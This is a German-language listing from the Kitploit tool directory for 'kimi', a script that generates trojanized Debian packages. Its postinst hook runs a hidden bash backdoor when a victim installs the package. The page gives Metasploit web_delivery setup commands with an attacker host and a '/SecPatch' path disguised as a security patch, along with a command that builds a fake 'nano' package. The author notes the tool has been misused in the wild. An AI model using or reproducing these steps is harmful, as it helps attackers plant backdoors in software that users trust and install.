Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
kimi — Skript zur Generierung bösartiger Debian-Pakete (Debian-Trojaner). | Kitploit
Tools/GitHubGitHub/chaitanyaharitash/kimi
Exploit-FrameworksPayload-GenerierungPost-ExploitationMalware-AnalysePenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubchaitanyaharitash/kimi

kimi

Skript zur Generierung bösartiger Debian-Pakete (Debian-Trojaner).

Repository anzeigen
123546vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

kimi - Generator für bösartige Debian-Pakete

Skript zum Generieren bösartiger Debian-Pakete (debain trojans).

Über & Vorteile & Verwendung & Getestet auf :::

root@kitploit:~
Kimi ist ein Name, inspiriert von "Kimimaro", einem meiner Lieblingscharaktere aus dem Anime "Naruto".

Kimi ist ein Skript, das ein bösartiges Debian-Paket für Metasploit generiert,
das aus einer Bash-Datei besteht. Die Bash-Datei wird im Verzeichnis "/usr/local/bin/" abgelegt.

Die Hintertür wird ausgeführt, sobald das Opfer versucht, das Deb-Paket zu installieren, aufgrund der postinst-Datei

Die Bash-Datei injiziert und fungiert auch wie ein Systembefehl, der, wenn vom Opfer ausgeführt,
dem Angreifer eine Session ermöglicht.

Vorteile :
-- Vollständig unabhängig. Der Benutzer muss keinen Debian-Paketersteller installieren.
-- Kann leicht mit jedem Payload-Generator integriert werden, dank der Argumentübergabe (lahm :P ich weiß)

Kimi basiert im Wesentlichen auf dem web_delivery-Modul und alles ist automatisiert.
Alles, was der Angreifer tun muss, ist die folgenden Einstellungen vorzunehmen:

Setting up Web_Delivery in msf :

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Generieren der bösartigen Payload :

dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386

HINWEIS :: Dieses Projekt wurde erstellt, um mit Venom Shellcode Generator 1.0.13 integriert zu werden.
Es kann auch eigenständig verwendet werden; alles, was der Benutzer tun muss, ist, den uripath in den msf-Variablen zu ändern.
-------------------------------------------------------------------------------------

Getestet auf :
            Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 
            ParrotOS (Debian Jessie)
            Kali Rolling 2.0
Tool herunterladen

Updates :::

root@kitploit:~
[Feb-22-2017]
-- Funktion zur Erstellung der "postinst"-Datei hinzugefügt, um die Ausführung der eingebetteten bösartigen Datei zu automatisieren
-- Funktion zur Generierung von RC-Dateien hinzugefügt, um die vollständige Automatisierung mit Handler-Öffnung zu ermöglichen, d.h. kein manuelles Setzen des Handlers erforderlich
-- Einige häufige Fehler behoben [besonderer Dank an r00t 3xp10it :)]

[Oct-12-2017]
-- Befehlszeilenargument (-a/--arch) hinzugefügt, um die Architektur auszuwählen (i386/amd64)

[April-24-2019] - Testversion.
-- Jetzt können benutzerdefinierte URI und LPORT eingestellt werden
-- Python-Payload wurde gemäß Python 2/3 und auch der neuesten Version von Metasploit 5 aktualisiert.
-- Der gesamte Code wurde neu implementiert, unterstützt aber weiterhin Python 2.7

Bildschirmfotos :::

Hauptbanner Kimi in Aktion

Sonstiges :::

root@kitploit:~
   Blogbeitrag     : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
   YouTube-Video : https://youtu.be/Dsn6BRHy9_w
   Viruatotal-Beispiel (Weil ich böswillige Nutzung dieses Skripts in freier Wildbahn gesehen habe): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f

Grüße an :::

Suspicious Shell Activity [Red Team]

Fragen? Beleidigungen?

Twitter : @bofheaded